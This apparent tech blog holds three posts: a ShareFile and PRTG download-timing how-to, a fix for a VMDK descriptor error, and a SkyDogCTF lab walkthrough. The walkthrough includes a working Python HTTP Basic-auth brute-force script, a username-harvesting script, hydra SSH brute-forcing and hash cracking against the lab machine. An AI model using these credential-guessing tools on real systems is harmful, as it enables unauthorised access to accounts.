Saturday, May 6, 2017

Trending ShareFile Downloads with PowerShell and PRTG


I’d like to trend the amount of time it takes to download a file from my on-premises storage zones versus the amount of time it takes to download a file from ShareFile’s public cloud. So here’s the plan: I’m going to create some shared folders on each of the storage zones I want to trend…

I’ll create a shared folder on ShareFile’s “US East” zone…

I’ll create a shared folder on my customer managed storage zone…

Notice in the screenshots above I’m disabling any retention policies.

I’ll upload the same file to each shared folder I created…

ShareFile US East


Storage Zone 1

Next, I’m going to grab the freeware version of PRTG and install it. The installation is pretty straightforward… https://www.paessler.com

Then I’m going to download and install the ShareFile PowerShell Snapin from GitHub… https://github.com/citrix/ShareFile-PowerShell/releases

You need the x86 version.  At the time of this post, version 1.82 has an x86 and x64 version.  I usually install both but x86 is required for integration with PRTG.

Open PowerShell x86 and set the execution policy to unrestricted (make sure you “run as administrator”).  The execution policy modification is needed for PRTG.  I did not test with other execution policies.

I’m going to use a ShareFile “service account” and generate a .sfps file using the New-SfClient command as documented in the ShareFile PowerShell SDK wiki found here… https://github.com/citrix/ShareFile-PowerShell/wiki/Getting-Started. It’s a simple process so I’m not going to include it in this post. I’m also using a bit of the code from one of the sample scripts.

Now, I’ll write a PowerShell script which times the downloads of the files from each zone.  I’m going to execute the script using PRTG which will record and chart the script output. 

I’m going to need a place to temporarily store the files the script downloads, so I’ll create a temp directory structure. I created a couple of directories: D:\temp\ShareFile_US_East and D:\temp\Storage_Zone_1.

I’m also giving the folders a name similar to the name of the zone.  This is important because I’ll be using this in the script for the PRTG channel label.
Here’s the PowerShell Script

I’ll put the script on the PRTG server in the following directory (this may vary on your system): C:\Program Files (x86)\PRTG Network Monitor\Custom Sensors\EXEXML
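The post’s own script survives only as a screenshot, so here is an added example of mine (not the post’s code) of an EXE/Script Advanced sensor script doing the same job: it times one download per zone with the ShareFile snapin and prints the EXEXML PRTG charts. The .sfps path, the shared-folder paths and the snapin cmdlets and parameters used (Get-SfClient, New-PSDrive -PSProvider ShareFile, Sync-SfItem -ShareFilePath/-LocalPath/-Download) are assumptions about the SDK, not something this post shows.

```powershell
# Added example, not the post's script. Assumes the ShareFile snapin cmdlets Get-SfClient,
# New-PSDrive -PSProvider ShareFile and Sync-SfItem (-ShareFilePath, -LocalPath, -Download),
# a .sfps file created with New-SfClient, and placeholder folder/file paths.
Add-PSSnapin ShareFile -ErrorAction Stop

$sfps     = 'C:\ProgramData\PRTG\sfclient.sfps'      # placeholder: service-account .sfps
$tempRoot = 'D:\temp'
# local folder name (doubles as the PRTG channel label) -> ShareFile path of the test file
$zones = [ordered]@{
    'ShareFile_US_East' = 'sf:/Shared Folders/ShareFile_US_East/testfile.bin'
    'Storage_Zone_1'    = 'sf:/Shared Folders/Storage_Zone_1/testfile.bin'
}

function ConvertTo-XmlSafe([string]$s) { [System.Security.SecurityElement]::Escape($s) }

$results = @()
try {
    $client = Get-SfClient -Name $sfps
    New-PSDrive -Name sf -PSProvider ShareFile -Root / -Client $client | Out-Null

    foreach ($zone in $zones.Keys) {
        $local = Join-Path $tempRoot $zone
        New-Item -ItemType Directory -Path $local -Force | Out-Null
        Remove-Item (Join-Path $local '*') -Recurse -Force   # always start from an empty folder

        $sw = [System.Diagnostics.Stopwatch]::StartNew()
        Sync-SfItem -ShareFilePath $zones[$zone] -LocalPath $local -Download | Out-Null
        $sw.Stop()

        # an empty folder means the download silently failed; do not chart a fast "success"
        if (-not (Get-ChildItem -Path $local -File)) { throw "nothing downloaded for $zone" }
        $results += [pscustomobject]@{ Channel = $zone.Replace('_', ' '); Ms = $sw.ElapsedMilliseconds }
        Remove-Item (Join-Path $local '*') -Recurse -Force   # clean up the temp copy
    }
}
catch {
    # EXEXML error block: PRTG turns the sensor red with this text instead of charting a value
    "<prtg><error>1</error><text>$(ConvertTo-XmlSafe $_.Exception.Message)</text></prtg>"
    return
}

# one channel per zone; unit TimeResponse makes PRTG chart the value as milliseconds
$xml = '<prtg>'
foreach ($r in $results) {
    $xml += "<result><channel>$(ConvertTo-XmlSafe $r.Channel)</channel><value>$($r.Ms)</value><unit>TimeResponse</unit></result>"
}
$xml += "<text>Timed $($results.Count) downloads</text></prtg>"
$xml
```

Because PRTG runs the script with the x86 PowerShell host, the snapin loaded here must be the x86 build mentioned above.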

Open the PRTG Enterprise Console…

Create a group…

Create a device in the group…

Add an EXE/Script Advanced sensor to the device

Set the sensor settings – define EXE/Script, timeout, scanning interval

And that’s it.  You should start seeing data in the PRTG console.

Here’s an example of some download times for a standard customer managed storage zone versus a ShareFile cloud managed storage zone.  This actually shows a trend with higher than expected download times for the standard storage zone.  Adjustments were made and you can see the download times decrease.


Saturday, December 24, 2016

ConvertTo-MvmcVirtualHardDisk: The entry is not a supported disk database entry for the descriptor.

I’ve run into this issue twice now when trying to convert an OVA into a VHD using ConvertTo-MvmcVirtualHardDisk.

Here’s what happens…

I download the OVA, rename the file to .zip and extract the contents. The virtual machines have typically been created/tested with VirtualBox, so the archive usually includes an OVF and a VMDK.

I open PowerShell and attempt to use ConvertTo-MvmcVirtualHardDisk but run into this error:


Here’s how to fix it.

1. Download dsfok-tools by Dariusz Stanislawek and extract the contents of the archive.

2. Run cmd.exe as administrator

3. Extract descriptor1.txt from the vmdk using dsfo.exe


4. Make a backup copy of descriptor1.txt.  If anything goes wrong just inject the backup.

5. Open descriptor1.txt (using Notepad++)


6. Comment all the lines after #DDB, delete the NUL and any “white space” at the end of the file.  Save the file.


7. Inject descriptor1.txt into the vmdk using dsfi.exe


8. Convert the vmdk to vhd


9. Create the virtual machine, attach the disk and boot the machine.

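Step 6 done as a PowerShell function instead of by hand in Notepad++, as an added example of mine (not from the post). It assumes descriptor1.txt was already extracted with dsfo.exe in step 3, so it still carries the NUL padding, and that the cleaned file is injected back with dsfi.exe as in step 7; the file names are placeholders.

```powershell
# Added example, not from the post: step 6 as a function. Assumes descriptor1.txt came
# straight out of dsfo.exe (NUL padding still present) and that the output file is
# injected back into the vmdk with dsfi.exe exactly as step 7 describes.
function Repair-VmdkDescriptor {
    param(
        [Parameter(Mandatory)][string]$InPath,
        [Parameter(Mandatory)][string]$OutPath
    )
    # read raw bytes so the NUL padding is handled explicitly instead of mangled by Get-Content
    $raw   = [System.IO.File]::ReadAllBytes($InPath)
    $text  = [System.Text.Encoding]::ASCII.GetString($raw) -replace "`0", ''
    $lines = $text -split "`r?`n"

    $afterDdb = $false
    $out = foreach ($line in $lines) {
        if ($afterDdb -and $line.Trim() -ne '' -and -not $line.StartsWith('#')) {
            "#$line"        # comment out every entry after #DDB, as step 6 does by hand
        } else {
            $line
        }
        if ($line.Trim() -eq '#DDB') { $afterDdb = $true }
    }

    # rejoin and drop the trailing white space at the end of the file
    $clean = ($out -join "`n").TrimEnd()
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($clean)

    # the descriptor occupies a fixed-size region of the vmdk; a longer file would be
    # injected over whatever follows that region, so refuse rather than corrupt the disk
    if ($bytes.Length -gt $raw.Length) {
        throw "cleaned descriptor is $($bytes.Length) bytes, original block was $($raw.Length)"
    }
    [System.IO.File]::WriteAllBytes($OutPath, $bytes)
    return $OutPath
}

Repair-VmdkDescriptor -InPath .\descriptor1.txt -OutPath .\descriptor1.clean.txt
```

Keep the untouched descriptor1.txt as the backup from step 4 and inject descriptor1.clean.txt with dsfi.exe.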

SkyDogCTF Walkthrough

This is the first time I’ve attempted a CTF.  Here’s a walkthrough for each flag.

Nmap scan…


SSH on port 22222 – Found flag #1 flag{53c82eba31f6d416f331de9162ebe997}


Cracked the hash – “encrypt”

findmyhash md5 -h 53c82eba31f6d416f331de9162ebe997


I pulled the index.html file with wget and found a comment about IE4 and /oldIE/html5.js


Reviewed the js file; the first line is hex…


Decoded the hex and found flag #2 flag{7c0132070a0ef71d542663e9dc1f5dee}


Cracked the hash – “nmap”


DIRB scan… and found /personnel


Tried to access /personnel but it seems to be “protected”


I assume “IE4” was a clue, so I tried accessing /personnel with an IE4 user agent – found flag #3 flag{14e10d570047667f904261e6d08f520f} and another clue – so far so good.


I decided to take a look with Firefox… Agent Hanratty


Cracked the hash – “evidence” …  Clue = new + flag = newevidence


I tried to access /newevidence with IE4 user agent – 401 Unauthorized


Same using Burp Suite (using the proxy to manipulate the user agent) and Firefox


Tried to log on with hanratty:hanratty; didn’t work.


What is Agent Hanratty’s first name? Google says it’s Carl


I setup Burp Suite Intruder in an attempt to gain access but the free version is pretty slow…


… so I wrote a crude script in Python.  This let me try several username combinations with a couple dirb word lists for the password.  I got lucky with username “carl.hanratty” and password “Grace”.


import base64
import os
import subprocess
import time  # only needed if the sleep at the bottom is re-enabled

username = 'carl.hanratty'
filename = '/usr/share/wordlists/dirb/others/names.txt'
target = 'http://192.168.12.12/newevidence'
# headers: same IE4 user agent that got /personnel to answer
useragent = '--user-agent=Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)'
accept = '--header=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
acceptlang = '--header=Accept-Language: en-US,en;q=0.5'
acceptenc = '--header=Accept-Encoding: gzip, deflate'
connection = '--header=Connection: close'
count = 0
with open(filename) as fp:
    for line in fp:
        password = line.rstrip("\n")
        creds = username + ":" + password
        # HTTP Basic auth is just base64("user:password")
        b64 = base64.b64encode(creds.encode('ascii')).decode('ascii')
        print("Trying %s %s" % (creds, b64))
        auth = "--header=Authorization: Basic %s" % b64
        try:
            subprocess.check_output(['wget', target, useragent, accept, acceptlang, acceptenc, connection, auth])
        except subprocess.CalledProcessError:
            pass  # wget exits non-zero on a 401, so keep going
        # wget saves the page as "newevidence" in the working directory once a request succeeds
        if os.path.isfile("/root/Desktop/scripts/newevidence"):
            break
        count += 1
        # time.sleep(1)

I took a look with Firefox…


Checked out the hyperlink “Evidence Summary File” - found flag #4 flag{117c240d49f54096413dd64280399ea9}


Cracked the hash – “panam”


The hyperlink “Possible Location” links to an image.jpg; I saved it, ran it through binwalk and then steghide with password “panam”. Found flag #5 flag{d1e5146b171928731385eb7ea38c37b8} and another clue. So far, the cracked hashes are clues for the next flag but…


I got stuck here for a bit and tried a bunch of things.  I ended up taking things back to the beginning with nmap.

I wasn’t sure why the server was running HTTPS; everything I found so far was accessible over HTTP.  I took a look using openssl s_client and found flag #6 flag{f82366a9ddc064585d54e3f78bde3221}. 


Since it’s labeled “flag3” - I was supposed to find it earlier in the game – better late than never.

Cracked the hash – “personnel” – HA! yes, this was a clue for earlier.  Thank goodness dirb found the directory.


Stuck again… decided to give SSH a whirl… meh.  Brute force here we come…

I tried some standard name lists with various combos of username formats with the cracked hashes and clues as passwords.  It was taking too long; the username list had too many names.  I need to be more specific…

I wrote a PowerShell script which queried Google looking for names related to the search strings I provided… (cheating? maybe… I didn’t review the results to see if anything was related to SkyDogCTF).

$searchstrings = @(
    "%22agent+hanratty%22",
    "%22catch+me+if+you+can%22",
    "%22Dont+go+Home+Frank%22",
    "%22Theres+a+Hex+on+Your+House%22",
    "%22Obscurity+or+Security%22",
    "%22Be+Careful+Agent+Frank+Has+Been+Known+to+Intercept+Traffic+Our+Traffic%22",
    "%22A+Good+Agent+is+Hard+to+Find%22",
    "%22The+Devil+is+in+the+Details+Or+is+it+Dialogue%22",
    "%22if+its+Simple+Guessable+or+Personal+it+Goes+Against+Best+Practices%22",
    "%22Where+in+the+World+is+Frank%22",
    "%22Frank+Was+Caught+on+Camera+Cashing+Checks+and+Yelling%22",
    "%22The+Fastest+Man+Alive%22",
    "%22Franks+Lost+His+Mind+or+Maybe+its+His+Memory%22",
    "%22He+Locked+Himself+Inside+the+Building%22",
    "%22Find+the+Code+to+Unlock+the+Door+Before+He+Gets+Himself+Killed%22",
    "%22encrypt%22",
    "%22nmap%22",
    "%22personnel%22",
    "%22newevidence%22",
    "%22panam%22",
    "%22iheartbrenda%22",
    "%22ILoveFrance%22"
)
$names = Get-Content C:\temp\names.txt   # one candidate first/last name per line
$googlenames = @()
$firstnamelastnames = @()
$googlednames = @()
$i = 1
$totalsearches = $searchstrings.Count
foreach ($searchstring in $searchstrings)
{
    Write-Host "Searching Google [$i of $totalsearches]... " -ForegroundColor Green
    $googlesays = Invoke-WebRequest "https://www.google.com/search?q=$searchstring" -UserAgent ([Microsoft.PowerShell.Commands.PSUserAgent]::InternetExplorer)
    # keep every name from the list that shows up anywhere in the result page
    $googlenames += $names | ?{ $googlesays.RawContent.Contains($_) }
    Write-Host " Parsing Results..." -ForegroundColor Cyan
    # look for "firstname lastname" pairs built from the names seen so far
    foreach ($firstname in $googlenames)
    {
        if ($googlesays.RawContent.Contains("$firstname") -eq $true)
        {
            $googlednames += "$firstname"
        }
        foreach ($lastname in $googlenames)
        {
            if ($googlesays.RawContent.Contains("$firstname $lastname") -eq $true)
            {
                $firstnamelastnames += "$firstname $lastname"
            }
        }
    }
    Write-Host "...Sleeping" -ForegroundColor Red
    Start-Sleep -Seconds 2
    $i++
}
# de-duplicate the pairs (Group-Object) and build the username formats to try;
# @() keeps each list an array even when only a single pair was found
$firstlast = @(($firstnamelastnames | Group-Object).Name.Replace(" ", ""))
#$first_space_last = @(($firstnamelastnames | Group-Object).Name)
$first_dot_last = @(($firstnamelastnames | Group-Object).Name.Replace(" ", "."))
$first_underscore_last = @(($firstnamelastnames | Group-Object).Name.Replace(" ", "_"))
$firstlast += @($firstlast.ToLower()) + @($firstlast.ToUpper())
#$first_space_last += @($first_space_last.ToLower()) + @($first_space_last.ToUpper())
$first_dot_last += @($first_dot_last.ToLower()) + @($first_dot_last.ToUpper())
$first_underscore_last += @($first_underscore_last.ToLower()) + @($first_underscore_last.ToUpper())
$firstlast
#$first_space_last
#$first_dot_last
#$first_underscore_last
#$googlednames | Group-Object

… this gave me a smaller list of usernames.  It was taking about 2 minutes to run ~200 usernames with one password at the default of 16 tasks in hydra.  I wasn’t sure of the username format so I used a couple variations and ended up with ~600 usernames and 8 passwords.  Again, I used the previous cracked hashes and clues for the password list.  I kicked hydra off and headed to bed.

The next day… ugh. No hits, but looking back through the logs I see a bunch of failures, reattempts, etc. To make a long story short, I rebooted the server and tried the user list with each password using the -p switch. I also throttled tasks down to 1. I was finally able to run through the lists with a smaller number of failures/reattempts. I’ll have to revisit this again in the future… anyhow, I got a hit.


SSH to the server with the credentials for barryallen; Found flag #7 flag{bd2f6a1d5242c962a05619c56fa47ba6}


Cracked the hash – “theflash”


The last flag has to be in the security-system.data file; so I downloaded it


Ran it through binwalk; appears to be a zip archive


Unzip and binwalk… looks like a dmp?


Ran it through volatility


Dumped the clipboard contents… “666c61677b38343164643364623239623066626264383963376235626537363863646338317d”


found flag #8 flag{841dd3db29b0fbbd89c7b5be768cdc81}


Attempted to crack the hash… not a known hash.
